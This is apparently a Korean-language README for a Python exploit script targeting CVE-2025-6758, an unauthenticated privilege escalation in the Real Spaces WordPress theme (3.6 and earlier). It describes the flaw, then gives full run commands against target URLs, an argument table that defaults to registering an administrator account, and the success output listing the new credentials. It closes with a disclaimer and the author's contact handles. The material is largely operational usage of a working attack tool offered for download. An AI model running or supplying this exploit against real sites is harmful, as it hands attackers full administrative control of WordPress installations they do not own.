
Real Spaces - WordPress Properties Directory Theme <= 3.6 - 인증되지 않은 권한 상승으로 관리자 권한 획득
imic_agent_register를 통한 관리자 권한 상승CVE-2025-6758
CVSS 점수: 9.8 (치명적)
WordPress용 Real Spaces - WordPress Properties Directory 테마는 3.6 이하의 모든 버전에서 imic_agent_register 함수를 통한 권한 상승 취약점에 노출됩니다.
이 취약점은 등록 중 역할 할당에 대한 제한이 충분하지 않아 발생하며, 인증되지 않은 공격자가 새 사용자 등록 시 Administrator를 포함한 역할을 임의로 지정할 수 있게 합니다.
이 치명적인 결함으로 인해 원격 공격자는 취약한 버전의 테마를 실행 중인 WordPress 사이트에 대한 전체 관리자 액세스 권한을 얻을 수 있으며, 영향을 받는 시스템의 무결성과 보안을 위험에 빠뜨립니다.
CVE-2025-6758.py는 이 취약점을 시연하고 활용하기 위해 Python으로 작성된 전문 익스플로잇 및 자동화 스크립트입니다.
이 스크립트는 침투 테스터와 보안 연구원을 위해 제작되었으며, 자동화된 탐지, nonce 추출, 그리고 매우 안정적이고 모듈화된 무소음 방식의 익스플로잇을 제공합니다.
python3 CVE-2025-6758.py -u http://TARGET/wordpress/
--username 사용자 지정 사용자 이름 설정 (기본값: Nxploited)--password 사용자 지정 비밀번호 설정 (기본값: 123456789)--email 사용자 지정 이메일 설정 (기본값: [email protected])--position 사용자 지정 position 설정 (기본값: Nxploitedadmin)--role 사용자 역할 설정 (기본값: administrator)--max-pages nonce 탐지를 위해 크롤링할 최대 페이지 수 (기본값: 30)--max-depth 최대 링크 크롤링 깊이 (기본값: 2)--scan-common-paths 추가 등록/플러그인/테마 경로 스캔--ajax-path 사용자 지정 AJAX POST 엔드포인트 (기본값: wp-admin/admin-ajax.php)--verify-ssl SSL 인증서 검증 활성화--cookie-save 세션 쿠키를 저장할 경로--save-json nonce 탐지 결과를 JSON으로 저장할 경로python3 CVE-2025-6758.py -u http://192.168.100.74:888/wordpress/ --username AdminX --password MySecretPass123 --scan-common-paths --debug
익스플로잇에 성공하면 스크립트는 다음을 출력합니다:
[+] Exploitation successful.
[+] Server message: You're successfully register
[+] Username: Nxploited
[+] Password: 123456789
[+] Email: [email protected]
익스플로잇이 실패하거나 nonce를 찾지 못하면 추가 문제 해결을 위한 설명 오류 메시지와 힌트가 표시됩니다.
이 스크립트는 교육, 연구 및 승인된 침투 테스트 목적으로만 사용됩니다.
소유자의 명시적 서면 허가 없이 웹사이트나 시스템에 대한 무단 사용은 엄격히 금지되며 불법일 수 있습니다.
저자는 이 스크립트의 사용으로 인한 오용이나 피해에 대해 책임을 지지 않습니다.
📧 이메일: [email protected]
📨 텔레그램: @Kxploit
📡 텔레그램 채널: @KNxploited
작성자: Nxploited ( Khaled Alenazi )
| Argument | Default Value | Description |
|---|
--username | Nxploited | 등록에 사용할 사용자 이름 설정 |
--password | 123456789 | 등록에 사용할 비밀번호 설정 |
--email | [email protected] | 사용자 지정 이메일 주소 설정 |
--position | Nxploitedadmin | 사용자 지정 position 값 설정 |
--role | administrator | 등록 역할 설정 (익스플로잇에는 Administrator 권장) |
--max-pages | 30 | nonce 탐지를 위해 크롤링할 최대 페이지 수 |
--max-depth | 2 | 최대 링크 크롤링 깊이 |
--scan-common-paths | None | nonce 탐지를 위해 추가 등록/플러그인/테마 경로 스캔 (플래그 전용) |
--ajax-path | wp-admin/admin-ajax.php | 사용자 지정 AJAX POST 엔드포인트 |
--verify-ssl | None | SSL 인증서 검증 활성화 (플래그 전용) |
--cookie-save | None | 세션 쿠키를 저장할 경로 (pickle 형식) |
--save-json | None | nonce 탐지 결과를 JSON으로 저장할 경로 |
--debug | None | 디버그 로깅 활성화 및 HTML/JS 스니펫 출력 (플래그 전용) |
--debug 디버그 로깅 활성화 및 HTML/JS 스니펫 출력